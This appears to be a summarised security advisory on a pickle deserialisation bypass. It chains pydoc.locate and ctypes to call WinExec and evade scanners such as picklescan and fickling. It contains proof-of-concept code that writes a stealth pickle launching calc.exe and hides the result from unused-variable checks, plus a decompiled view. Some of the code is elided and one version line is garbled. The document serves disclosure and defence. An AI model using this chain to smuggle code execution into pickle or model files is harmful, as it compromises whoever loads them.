From the screenshot, the following key information about the vulnerability can be extracted: ### Summary - **Vulnerability Name**: `ctypes and pydoc gadget chain to bypass detection` - **Publisher**: thomas-chauchefoin-tob - **Release Time**: Last week - **CVE ID**: Unknown - **Severity**: High ### Affected and Fixed Versions - **Affected Versions**: `= v0.1.7` ### Vulnerability Details - **Description**: This vulnerability exploits the `ctypes` and `pydoc` modules to bypass detection; when combined, they can achieve remote code execution (RCE). - **Cause**: The `ctypes` and `pydoc` modules are not explicitly blocked, and existing pickle scanning tools (such as picklescan) cannot prevent the `pydoc.locate` method. - **Report ID and Resolution Link**: b793563 #### Exploitation Steps 1. Import `GLOBAL pydoc locate`. 2. Call `locate('ctypes.windll.kernel32.WinExec')`. 3. Execute the returned result with `b'calc.exe'`. ### Proof of Concept (PoC) Code Example ```python import os GLOBAL = b'c' STRING = b'S' BININT = b'K' TUPLE1 = b'\x85' ... def generate_stealth_payload(): payload = b"" payload += GLOBAL + b"pydoc\nlocate\n" payload += STRING + b"ctypes.windll.kernel32.WinExec\n" payload += TUPLE1 + REDUCE payload += PUT + b"0\n" # Var 0 = payload += POP payload += GET + b"0\n" payload += b'C' + b"\x08" + b"calc.exe" payload += BININT + b"\x01" payload += TUPLE2 + REDUCE payload += PUT + b"1\n" # Var 1 = Execution Result payload += POP payload += GLOBAL + b"builtins\nException\n" payload += EMPTY_TUPLE + REDUCE payload += PUT + b"2\n" # Var 2 = Exception instance payload += EMPTY_DICT payload += STRING + b"'rce_status'\n" payload += GET + b"1\n" payload += SETITEM payload += BUILD payload += STOP return payload data = generate_stealth_payload() with open("stealth_ctypes.pkl", "wb") as f: f.write(data) print("Generated 'stealth_ctypes.pkl'") ``` ### Fickling Perspective ```python from pydoc import locate _var0 = locate('ctypes.windll.kernel32.WinExec') _var1 = _var0(b'calc.exe', 1) _var2 = Exception() _var3 = _var2 _var3.__setstate__({'rce_status': _var1}) result0 = _var3 ``` Throughout the process, the malicious example attempts to execute `calc.exe` while bypassing detection. The demonstrator also mentioned using an exception object to circumvent unused variable checks, further enhancing the stealthiness of the exploit.